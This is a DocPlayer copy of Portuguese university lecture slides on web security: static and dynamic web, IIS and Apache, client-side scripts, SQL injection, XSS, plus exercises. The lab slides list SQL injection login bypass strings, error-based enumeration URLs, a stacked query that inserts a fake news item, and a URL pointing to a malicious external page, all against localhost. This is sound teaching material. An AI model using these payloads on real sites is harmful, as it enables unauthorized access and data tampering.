Segurança na WEB Ambiente WEB estático



Documentos relacionados
Programação e Designer para WEB

Fonte: - Illustration by Gaich Muramatsu

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo

Segurança em Sistemas Web. Addson A. Costa

Programação e Designer para WEB

Programação Web Prof. Wladimir

Programação e Designer para WEB

Segurança de Redes. Funcionamento de um ataque. Varreduras Analisadores de vulnerabilidades. Levantamento de informações.

Laboratório de Redes de Computadores e Sistemas Operacionais

Introdução à Tecnologia Web. Tipos de Sites. Profª MSc. Elizabete Munzlinger

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

CURSO EFA DE TÉCNICO DE INFORMÁTICA E SISTEMAS. Módulo 788- Administração de Servidores Web. Ano letivo Docente: Ana Batista

Desenvolvimento e disponibilização de Conteúdos para a Internet

IIH Introdução à Informática e Hardware

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

SERVIDOR WEB - APACHE SERVIDOR WEB - APACHE SERVIDOR WEB - APACHE 27/02/2012

Introdução ao Sistema. Características

World Wide Web e Aplicações

UNICE Ensino Superior Linguagem de Programação Ambiente Cliente Servidor.

LINGUAGEM DE PROGRAMAÇÃO WEB

Início do 2º Período em 05/01/09 Férias do Carnaval de 23/02/09 a 25/02/09 Fim do 2º Período em 27/03/09. Número de Tempos Lectivos do 2º Período 34

Ataques a Aplicações Web

Satélite. Manual de instalação e configuração. CENPECT Informática cenpect@cenpect.com.br

Instalando o Internet Information Services no Windows XP

FACULDADE SENAC-RS PELOTAS RODRIGO ALMEIDA PEREIRA. Sistemas de Informação


Conteúdo Programático de PHP

Desenvolvendo Websites com PHP

Na tela dele, clique no sinal de + ao lado do nome do seu computador, para expandi-lo. A seguir, expanda também o item "Sites da web".

Trabalho de Sistema de Informações. Instalação e configuração aplicativo Ocomon

Guia de Instalação SIAM. Internet Information Services - IIS 5.1 no Windows XP Pro

O melhor do PHP. Por que PHP? CAPÍTULO 1. Uma Pequena História do PHP

Conceitos Básicos

PHP Material de aula prof. Toninho (8º Ano)

Programando em PHP. Conceitos Básicos

Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com

Desempenho. Processos. Processos. Gerente Apuração de dados. Avaliação. Avaliação. Avaliação. Planejamento. Implantação. Diagnóstico.

Programação WEB. Prof. André Gustavo Duarte de Almeida docente.ifrn.edu.br/andrealmeida. Aula III Introdução PHP

SEI - Procedimento para configurações e testes da instalação e uso de Token/Certificado Digital

Integrantes: Catarino Rodrigues Data: 26/10/2012. Leandro de Matos Pereira. Leandro dos Santos Marciano. Ramon Alves de Souza

Instalação do PHP no Linux

Tecnologia WEB III. Prof. Erwin Alexander Uhlmann. PHP e MySQL. UHLMANN, Erwin Alexander. Introdução ao PHP. Instituto Siegen. Guarulhos, 2012.

Manual de Instalação do OASIS

Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho

Aplicação web protegida

Uniscan. Web Vulnerability Scanner

FTIN Formação Técnica em Informática Módulo Sistema Proprietário Windows AULA 06. Prof. André Lucio

Tecnologias WEB Web 2.0

XSS - CROSS-SITE SCRIPTING

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.

Guia de instalação para ambiente de Desenvolvimento LINUX

Software Adobe DreamWeaver. Requisitos para criar aplicações Web

Você pode testar se está tudo OK, abrindo um navegador no Debian Linux e acessando qualquer site.

Instalação rápida do Expresso

Linguagem de. Aula 06. Profa Cristiane Koehler

FTIN Formação Técnica em Informática. Sistema Operacional Proprietário Windows Prof. Walter Travassos

SCE-557. Técnicas de Programação para WEB. Rodrigo Fernandes de Mello

SIQ GQF Plugin s WEB (Aplicações WEB) Gestão da Qualidade de Fornecedores

ESTUDO SOBRE AS LINGUAGENS DE PROGRAMAÇÃO HOSPEDEIRAS SUPORTADAS PELA FERRAMENTA HTML. Aluno: Rodrigo Ristow Orientador: Wilson Pedro Carli

MALWARE. Spyware. Seguem algumas funcionalidades implementadas em spywares, que podem ter relação com o uso legítimo ou malicioso:

Certificado Servidor Web Importação por Microsoft IIS


UNIVERSIDADE ESTADUAL DE GOIÁS

Manual de Instalação e Utilização - Bug Wisard Report

Prof.: MARCIO HOLLWEG

Como atualizar o arquivo de licença do HSC ISS Free

Linux - Servidor de Redes

MANUAL DE CONFIGURAÇÃO

Aula 1 Desenvolvimento Web. Curso: Técnico em Informática / 2º módulo Disciplina: Desenvolvimento Web Professora: Luciana Balieiro Cosme

Prova de pré-requisito

MINICURSO WINDOWS SERVER 2008 UTILIZANDO O VMWARE PLAYER

Curso de Aprendizado Industrial Desenvolvedor WEB

O sistema operacional recomendado deve ser o Windows 2003, Windows 2000 ou Windows XP (nessa ordem de recomendação).

Informática I. Aula 6. Aula 6-12/09/2007 1

Manual do IpêCMS. Autor: Everton R. Silva Data: Website:

0,5 pelo negrito das palavras ID, Nome, e Analisar em outro momento.

Configurando o IIS no Server 2003

FACULDADE DE TECNOLOGIA SENAC GESTÃO DA TECNOLOGIA DA INFORMAÇÃO LABORATORIO DE REDE

OURO MODERNO Web Designer APOSTILA DE EXEMPLO. (Esta é só uma reprodução parcial do conteúdo)

Data de Aplicação. Instalação e Configuração do IIS Internet Information Services

DESENVOLVIMENTODE APLICAÇÕESPARAINTERNET:PHP. VitorFariasCoreia

UM NOVO CONCEITO EM AUTOMAÇÃO. Série Ponto

BANCO DE DADOS CONTEÚDO INFORMÁTICA. Prof.: MARCIO HOLLWEG BANCO DE DADOS SGBD TABELA CONCEITOS BÁSICOS

Encontrando falhas em aplicações web baseadas em flash. Wagner Elias Gerente de Pesquisa e Desenvolvimento Conviso IT Security

Transcrição:

Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1

Ambiente Web Dinâmico Servidor Web Cliente Navegadores Servidores de BD Processo de registro de um domínio Registrar o nome do domínio Nacional http://www.registro.br Internacional Várias empresas são credenciadas (http://www.internic.com/alpha.html) 2 servidores de DNS Traduzem o nome www seila com para um Traduzem o nome www.seila.com para um endereço IP 200.200.20.1 2

Diretórios em servidor web Internet Information Service - IIS C:\inetpub\wwwroot Apache \var\www Arquivos colocados nestes diretórios são lidos pela raiz do site: Exemplo: c:\inetpub\www\seila.html http://www.site.com.br/seila.html Uso de scripts Javascript Um pouco mais dinâmica <script language="javascript"> nome = prompt("diga-me seu nome:"," )} document.write("<h1>olá " + nome + "</h1>") </script> Vbscript <SCRIPT LANGUAGE="VBScript"> Nome=inputbox( Digite um nome: ) Msgbox( Ola & nome) </SCRIPT> 3

Problema Uma autenticação via client-side (Nunca faça isso em casa!!!!) <script language="javascript"> var ra = prompt("digite seu RA:"); var senha = prompt("digite sua senha:"); if(ra==11111111 && senha==1111) { document.writeln("<span class='style6'><br /><span class='style11'>seja muiiiito Bem Vindo!!!</span></span></span></div>"); } else { document.writeln("<span class='style6'><br />Não Autorizado</span></span></div>"); } </script> Aplicações web Intranet Extranet Dinâmicas Acesso a banco de dados Precisamos de interação!!! Linguagens Client side Escrita dentro da página html Usuário têm acesso ao código fonte g Ex; javascript e vbscript Server side São processadas no servidor Servidor retorna resultado em forma de página html Usuários não conseguem ver o código fonte 4

Windows Web: IIS Linguagem: ASP, ASP.NET Banco de Dados: SQL Server ou outros Linux Web: Apache Linguagem: PHP Banco de Dados: Mysql, Postgre, outros Ambientes Server-Side AMP Apache Mysql PHP LAMP Linux Apache Mysql - PHP Sql Injection XSS - Cross Site Scripting XPath Tipos de Ataques 5

SQL Injection Método de se inserir comandos SQL em entradas de páginas web; As páginas dinâmicas na web recebem parâmetros do usuário e repassam via consulta para o servidor de banco de dados Exemplo: Login, consultas Com o artifício do SQL Injection, é possível: entrar autenticado sem possuirmos credenciais realizar comandos SQL (Ex: drop table) inserir dados nas tabelas Páginas que podem ser exploradas: ASP, JSP, CGI ou PHP Entrando autorizado Laboratório 6

Laboratório No login posso tentar Campos numéricos 1 or1=1 1 Campos texto or = Caracter de scape 1 or 1=1 Laboratório Inserindo dados 7

Laboratório Utilizando as mensagens de erro http://localhost/noticia.asp?id=1 having 1=1 http://localhost/noticia.asp?id=1 group by noticias.codigo having 1=1 http://localhost/noticia.asp?id=1 asp?id=1 group by noticias.codigo,titulo codigo titulo having 1=1 http://localhost/noticia.asp?id=1 group by noticias.codigo,titulo,texto having 1=1 Depois de descoberto os campos, adiciono uma notícia falsa http://localhost/noticia.asp?id=1%20group%20by%20noticias.codigo,ti tulo,texto;insert%20into%20noticias(codigo,titulo,texto )%20VALUES(9999,'Falencia','A%20empresa%20decretou%20fale ncia');--- XSS Cross Site Scripting As vulnerabilidades Cross-site scripting (por vezes chamado de XSS) ocorrem quando um invasor usa uma aplicação web para enviar código malicioso, geralmente na forma de um script, para um outro usuário final. Estas vulnerabilidades estão muito difundidas e ocorrem sempre que uma aplicação web utiliza a entrada do usuário na saída que aplicação gera sem validá-la. (owasp) 8

Laboratório http://localhost/sobre.asp?pagina=sobrenos.htm http://localhost/sobre.asp?pagina=http://www.sitemalicioso.com/outrapagina.htm Exercícios 1-) Quais danos podem ser causados por ataques de Sql Injection? 2-) O que é Blind SQL Injection? 3-) Quais as contra-medidas contra XSS e Sql Injection? 4-) Não mostrar mensagens de erros do servidor web são suficientes para frustar tentativas de ataque. Você concorda com esta afirmação. Justifique. 5-) O que é, e quais os problemas de uma backdoor web? 9

Bibliografia Livro texto ANONIMO,.. Segurança Máxima Totalmente Atualizado. 3.ed. Rio de Janeiro: CAMPUS, 2005. Complementar BURNETT, Steve; PAINE, Stephen. Criptografia e Segurança: o guia oficial RSA. 1.ed. São Paulo: Campus, 2002. PETERSON, L.L. Redes de Computadores: uma abordagem de sistemas. 3.ed. Rio de Janeiro: Campus, 2004. WADLOW, Thomas. Segurança de Redes: Projeto e Gerenciamento de Redes Segura. 1.ed. Rio de Janeiro: Campus, 2000. SCHNEIER, Bruce. Segurança.com: Segredos e Mentiras Sobre a Proteção na Vida Digital. 1.ed. Rio de Janeiro: CAMPUS, 2001. 10

2024 © DocPlayer.com.br Política de Privacidade | Termos de serviço | Feedback